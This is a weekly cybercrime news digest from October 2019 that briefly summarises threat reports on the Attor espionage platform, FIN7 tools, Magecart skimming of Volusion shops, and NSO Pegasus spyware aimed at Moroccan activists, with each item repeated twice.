CyberCrime - W/E - 10/11/19
Attor Platform Spies on Russian Speakers as It Hides Behind Tor (10/10/2019)
A cyber espionage platform dubbed "Attor" by ESET researchers uses two features to avoid detection and analysis. Attor's GSM (Global System for Mobile Communications) plugin uses the AT command protocol and then uses Tor for its network communications for its highly targeted operations. The platform has existed since at least 2013 and monitors victim activities by screenshotting specific applications. Attor is primarily targeting Russian speakers and has been seen attacking diplomats, government institutions, and individuals concerned with their privacy.
A cyber espionage platform dubbed "Attor" by ESET researchers uses two features to avoid detection and analysis. Attor's GSM (Global System for Mobile Communications) plugin uses the AT command protocol and then uses Tor for its network communications for its highly targeted operations. The platform has existed since at least 2013 and monitors victim activities by screenshotting specific applications. Attor is primarily targeting Russian speakers and has been seen attacking diplomats, government institutions, and individuals concerned with their privacy.
FIN7 Adds Dangerous New Tools to Threat Arsenal (10/10/2019)
FireEye identified and analyzed two new tools in use by the FIN7 threat group. BOOSTWRITE is an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. One variant of BOOSTWRITE contained the Carbanak and RDFSNIFFER payloads. RDFSNIFFER is the second tool and appears to have been developed to tamper with NCR's Aloha Command Center client, a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. RDFSNIFFER contains a backdoor component enabling an attacker to upload, download, execute and/or delete arbitrary files. FireEye notified NCR of the RDFSNIFFER tool.
FireEye identified and analyzed two new tools in use by the FIN7 threat group. BOOSTWRITE is an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. One variant of BOOSTWRITE contained the Carbanak and RDFSNIFFER payloads. RDFSNIFFER is the second tool and appears to have been developed to tamper with NCR's Aloha Command Center client, a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. RDFSNIFFER contains a backdoor component enabling an attacker to upload, download, execute and/or delete arbitrary files. FireEye notified NCR of the RDFSNIFFER tool.
Magecart Compromises Ecommerce Cloud Platform, Injects Credit Card Skimmers (10/10/2019)
A Magecart attack compromised the cloud platform of the ecommerce service provider Volusion, resulting in the breach of several online shops. According to Trend Micro, malicious code was placed in a JavaScript library provided by Volusion to its client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. Volusion acknowledged the compromise and deployed a resolution. Trend Micro attributes this compromise to Magecart Group 6, which is also known as FIN6.
A Magecart attack compromised the cloud platform of the ecommerce service provider Volusion, resulting in the breach of several online shops. According to Trend Micro, malicious code was placed in a JavaScript library provided by Volusion to its client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. Volusion acknowledged the compromise and deployed a resolution. Trend Micro attributes this compromise to Magecart Group 6, which is also known as FIN6.
Magecart Threat Group Tied to Cobalt Cyber Attackers (10/07/2019)
RiskIQ has warned that the Magecart group is becoming a serious threat, as the entity's skimmers have appeared over two million times and breached over 18,000 hosts. Magecart's average breach length is 22 days and 17% of malicious advertisements observed by RiskIQ were infected with Magecart skimmers. Magecart actually consists of more than one group of attackers. In a separate report, Malwarebytes and HYAS connected Magecart Group 4 with the well-known Cobalt Group by matching patterns in email addresses that were used to register domains. Group 4 has also been conducting both client-side and server-side skimming, while the other Magecart groups only use client-side skimming.
RiskIQ has warned that the Magecart group is becoming a serious threat, as the entity's skimmers have appeared over two million times and breached over 18,000 hosts. Magecart's average breach length is 22 days and 17% of malicious advertisements observed by RiskIQ were infected with Magecart skimmers. Magecart actually consists of more than one group of attackers. In a separate report, Malwarebytes and HYAS connected Magecart Group 4 with the well-known Cobalt Group by matching patterns in email addresses that were used to register domains. Group 4 has also been conducting both client-side and server-side skimming, while the other Magecart groups only use client-side skimming.
Moroccan Human Rights Activists Targeted by NSO Group Spyware (10/10/2019)
Two human rights defenders in Morocco have been targeted using surveillance technology developed by the Israeli-based company NSO Group, according to research published by Amnesty International. Maati Monjib, an academic and human rights activist, and Abdessadak El Bouchattaoui, a human rights lawyer who has represented protesters from the Hirak El-Rif social justice movement, received SMS messages containing malicious links that if clicked would secretly install Pegasus software, allowing the sender to obtain near-total control of the phone. The same technology was used to target an Amnesty staff member and a Saudi Arabian human rights activist in June 2018. NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising concerns that Moroccan security agencies are behind the surveillance.
Two human rights defenders in Morocco have been targeted using surveillance technology developed by the Israeli-based company NSO Group, according to research published by Amnesty International. Maati Monjib, an academic and human rights activist, and Abdessadak El Bouchattaoui, a human rights lawyer who has represented protesters from the Hirak El-Rif social justice movement, received SMS messages containing malicious links that if clicked would secretly install Pegasus software, allowing the sender to obtain near-total control of the phone. The same technology was used to target an Amnesty staff member and a Saudi Arabian human rights activist in June 2018. NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising concerns that Moroccan security agencies are behind the surveillance.
US Businesses, Consumers Threatened by Targeted Ransomware Attacks (10/07/2019)
The Internet Crime Complaint Center (IC3) issued a warning regarding targeted ransomware. According to the FBI, cyber thieves are using email phishing, Remote Desktop Protocol vulnerabilities, and software vulnerabilities to target consumers and companies and to make their activities more effective.
The Internet Crime Complaint Center (IC3) issued a warning regarding targeted ransomware. According to the FBI, cyber thieves are using email phishing, Remote Desktop Protocol vulnerabilities, and software vulnerabilities to target consumers and companies and to make their activities more effective.